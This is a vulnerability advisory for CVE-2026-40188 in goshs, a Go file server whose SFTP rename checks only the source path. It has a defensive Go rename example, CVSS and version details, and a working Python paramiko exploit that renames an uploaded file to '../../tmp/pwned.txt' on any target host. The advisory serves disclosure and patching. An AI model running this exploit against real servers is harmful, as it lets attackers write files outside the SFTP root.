Security Vulnerability Report
CVE-2026-40188 CVSS 7.7 HIGH

Published: 2026-04-10 20:16:24
Last Modified: 2026-04-14 20:15:29

Description

goshs is a SimpleHTTPServer written in Go. From 1.0.7 to before 2.0.0-beta.4, the SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. This vulnerability is fixed in 2.0.0-beta.4.
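A rename handler that confines both operands to the served root, as an added example (not code from goshs or its fix commit). The helper names `confine` and `safeRename` and the temporary sandbox directory are assumptions made for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// ErrOutsideRoot reports a client path that resolves outside the served root.
var ErrOutsideRoot = errors.New("path escapes SFTP root")

// confine maps a client-supplied path onto the local filesystem and rejects
// anything that lexically resolves outside root. Hypothetical helper: it does
// not follow symlinks that already exist inside root.
func confine(root, clientPath string) (string, error) {
	full := filepath.Join(root, clientPath) // Join also collapses ".." segments
	rel, err := filepath.Rel(root, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideRoot
	}
	return full, nil
}

// safeRename confines BOTH operands before touching the filesystem. Checking
// only src is the flaw class described above: dst would reach os.Rename as-is.
func safeRename(root, src, dst string) error {
	from, err := confine(root, src)
	if err != nil {
		return fmt.Errorf("rename source %q: %w", src, err)
	}
	to, err := confine(root, dst)
	if err != nil {
		return fmt.Errorf("rename destination %q: %w", dst, err)
	}
	return os.Rename(from, to)
}

func main() {
	root, _ := os.MkdirTemp("", "sftproot") // constructed sandbox for the demo
	defer os.RemoveAll(root)
	os.WriteFile(filepath.Join(root, "payload.txt"), []byte("demo"), 0o600)

	fmt.Println(safeRename(root, "payload.txt", "../../tmp/pwned.txt")) // rejected
	fmt.Println(safeRename(root, "payload.txt", "renamed.txt"))         // allowed
}
```

The check is purely lexical, so a deployment that allows symlinks inside the root needs an additional resolved-path check before the rename.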

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:goshs:goshs:*:*:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:goshs:goshs:2.0.0:beta1:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:goshs:goshs:2.0.0:beta2:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:goshs:goshs:2.0.0:beta3:*:*:*:go:*:* - VULNERABLE
goshs 1.0.7
goshs versions before 2.0.0-beta.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import paramiko
import sys

# Exploit for CVE-2026-40188: goshs SFTP Path Traversal via Rename
# Target: goshs < 2.0.0-beta.4


def exploit(host, port, username, password):
    try:
        # Create SSH client
        transport = paramiko.Transport((host, port))
        transport.connect(username=username, password=password)
        sftp = paramiko.SFTPClient.from_transport(transport)
        print(f"[*] Connected to {host}:{port}")

        # 1. Create a dummy file inside the allowed root directory
        local_file = 'payload.txt'
        remote_safe_file = 'payload.txt'
        with open(local_file, 'w') as f:
            f.write('Malicious content')
        sftp.put(local_file, remote_safe_file)
        print(f"[*] Uploaded {local_file} to {remote_safe_file}")

        # 2. Exploit the rename vulnerability
        # Source path is sanitized, but Destination path is NOT
        # We try to rename the file to escape the root directory
        malicious_dest = "../../tmp/pwned.txt"
        print(f"[*] Attempting to rename {remote_safe_file} to {malicious_dest}...")
        sftp.rename(remote_safe_file, malicious_dest)
        print("[+] Exploit successful! File written outside root directory.")

        sftp.close()
        transport.close()
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 5:
        print(f"Usage: python {sys.argv[0]} <host> <port> <user> <pass>")
        sys.exit(1)
    exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4])
```

References

https://github.com/patrickhener/goshs/commit/141c188ce270ffbec087844a50e5e695b7da7744 - Patch
https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4 - Product, Release Notes
https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx - Exploit, Vendor Advisory

Weakness

CWE-1314